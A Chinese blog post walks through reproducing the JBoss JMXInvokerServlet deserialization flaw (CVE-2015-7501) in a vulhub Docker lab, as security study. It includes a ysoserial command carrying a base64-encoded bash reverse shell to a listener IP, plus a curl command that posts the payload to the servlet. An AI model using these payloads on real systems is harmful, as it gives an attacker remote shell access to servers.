JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)

最新推荐文章于 2023-03-13 15:58:28 发布
最新推荐文章于 2023-03-13 15:58:28 发布
阅读量2k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: jboss 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414143
版权

声明

好好学习,天天向上

漏洞描述

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

复现过程

这里使用6.1.0版本

使用vulhub

cd /app/vulhub-master/jboss/JMXInvokerServlet-deserialization

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:8080/

http://192.168.239.129:8080/

访问如下链接有文件下载

http://192.168.239.129:8080/invoker/JMXInvokerServlet

下载工具

https://cdn.vulhub.org/deserialization/DeserializeExploit.jar

用了一下,是乱码,试试yso吧,kali执行下面命令(echo后面那一串,自行用base64解码后修改再编码)

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMzkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i} " >exp.ser

kali监听6666端口后,再次执行

curl http://192.168.239.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

在这里插入图片描述

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 6839
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
JBoss JMXInvokerServlet 序列漏洞CVE-2015-7501和CVE-2017-12149)
来到了学渣的博客
08-29 5079
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。 CVE-2017-12149适用JBoss版本:5.x / 6.x 踩坑提醒:生成的ser文件最好在linux系统操作,windows会出现各种错误,甚至shell弹不回来。 步骤: 发现漏洞指纹→弹shell进行编码→用ysoserial把编码好的弹shell生ser文件→启动监听→用curl或
Jboss序列漏洞复现
weixin_53747497的博客
02-24 517
JBoss 在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们 可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。Java序列错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中 没有进行任何安全检查的情况下尝试将来自客户端的数据流进行序列,请求中读取了用户传入的对象,从而导致了漏洞
JBoss漏洞 - CVE-2010-0738 CVE-2015-7501
HAKUNAMATATATTA的博客
12-13 1925
CVE-2010-0738 CVE-2015-7501 漏洞复现
JBoss中间件漏洞总结
weixin_42345596的博客
08-27 1315
一.Jboss简介 Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080 二.Jboss安装 下载地址:https://jbossas.jboss.org/downloads/ 1.安装jdk 这里用了两台机子,一台安装老版本J
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具
07-23
渗透测试人员使用“CVE-2015-7501-master”这样的工具是为了模拟攻击,评估系统对这种类型漏洞的防御能力。该工具可能包含了构造恶意序列数据的方法,以及利用漏洞获得shell的方法。在进行渗透测试时,这些工具...
Jboss Application Server序列命令执行漏洞利用工具(CVE-2017-12149)
07-23
在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个序列漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 序列是将已序列的对象...
Java序列漏洞利用工具.zip
04-10
标题"Java序列漏洞利用工具.zip"表明该压缩包内包含了针对Java序列漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
jboss序列漏洞检测工具
02-15
jboss中间件的序列漏洞检测工具,可检测主机搭建的中间件并获得shell
CVE-2017-12149JBOSSas6.X序列(弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 序列漏洞详解及弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的序列过程。在Java中,...
HTTP.sys 远程执行代码漏洞(CVE-2015-1635)(MS15-034)简单测试
热门推荐
rigous的博客
03-08 1万+
        无意中用扫描器扫到了HTTP.sys 漏洞,因为之前写过python单poc脚本,感觉exp应该也是存在的。本着常识的心态找一下利用代码,如果能提权是再好不过的。    根据网上的记录,此漏洞利用最多的是导致蓝屏。RCE还无法找到,可能被大牛私藏了。由于会导致BSOD,所以只能在本地进行测试了。步骤如下:    1、环境搭建,由于本人的server只有2003,只能安装iis6.0...
“微软超级漏洞”?关于CVE-2020-0601的官方回复
SSL加密技术
01-16 1214
随着微软发布漏洞补丁,多家媒体先后报道,但对漏洞描述与官方公开文档有一定出入。微软内部人员称:部分媒体存在选择性说明事实、夸大事实、恶意揣测和发布不负责任的虚假内容的情况。基于此,笔者想和大家客观地梳理一下此次所谓的“微软超级漏洞”。 在微软例行公布的1月补丁更新列表中,有一个漏洞引起了大家的高度关注:一个位于 CryptoAPI.dll 椭圆曲线密码 ( ECC ) 证书的验证绕过漏洞——CV...
渗透测试-JBoss 5.x/6.x序列漏洞
道阻且长,行则将至。
07-08 1728
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x序列命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
JBoss 5.x/6.x 序列漏洞CVE-2017-12149)
zzzzz1284的博客
03-13 258
CVE-2017-12149
Jboss相关漏洞
谢公子的博客
01-08 2723
目录 Jboss JBoss JMXInvokerServlet 序列漏洞(CVE-2015-7501) JBoss 4.x JBossMQ JMS 序列漏洞CVE-2017-7504) JBoss 5.x/6.x 序列漏洞复现(CVE-2017-12149) Jboss管理控制台 Jboss4.x Jboss5.x/6.x jboss4.x jmx-console管...
JBoss 5.x/6.x 序列漏洞CVE-2017-12149) 复现
YouthBelief的博客
11-01 642
JBoss漏洞复现前言一、JBoss 5.x/6.x 序列漏洞CVE-2017-12149)0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结 前言 使用bash来弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 一、JBoss 5.x/6.x 序列漏洞CVE-2017-12149) 0x01 漏洞描述 该漏洞为 Java序列错误类型,存在于 Jboss 的 Ht
JBoss序列
weixin_41438728的博客
11-16 2116
这里写目录标题基础知识原理CVE-2017-12149CVE-2017-7504验证复现思路复现-CVE-2017-12149复现-CVE-2017-7504 基础知识 序列就是把对象转换成字节流,便于保存在内存、文件、数据库中;序列即逆过程,由字节流还原成对象。 Java中的ObjectOutputStream类的writeObject()方法可以实现序列,ObjectInputStream类的readObject()方法用于序列。 形成漏洞的根源在于类ObjectInputStream在
glibc CVE-2015-7547漏洞的分析和修复方法
tengxy_cloud的专栏
02-29 3820
glibc中处理DNS查询的代码中存在栈溢出漏洞,远端攻击者可以通过回应特定构造的DNS响应数据包导致glibc相关的应用程序crash或者利用栈溢出运行任意代码。应用程序调用使用getaddrinfo 函数将会收到该漏洞的影响。
【vulhub】JBOSS 5.x/6.x 序列远程代码执行漏洞CVE-2017-12149)复现
qq_45300786的博客
04-14 1107
一、漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。该漏洞为 Java序列错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行序列,从而导致了漏洞。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、搭建环境 docker-compose
jboss序列漏洞
最新发布
08-16
JBoss序列漏洞是指JBoss应用服务器中存在的一种安全漏洞,具体表现为Java序列错误类型。该漏洞存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值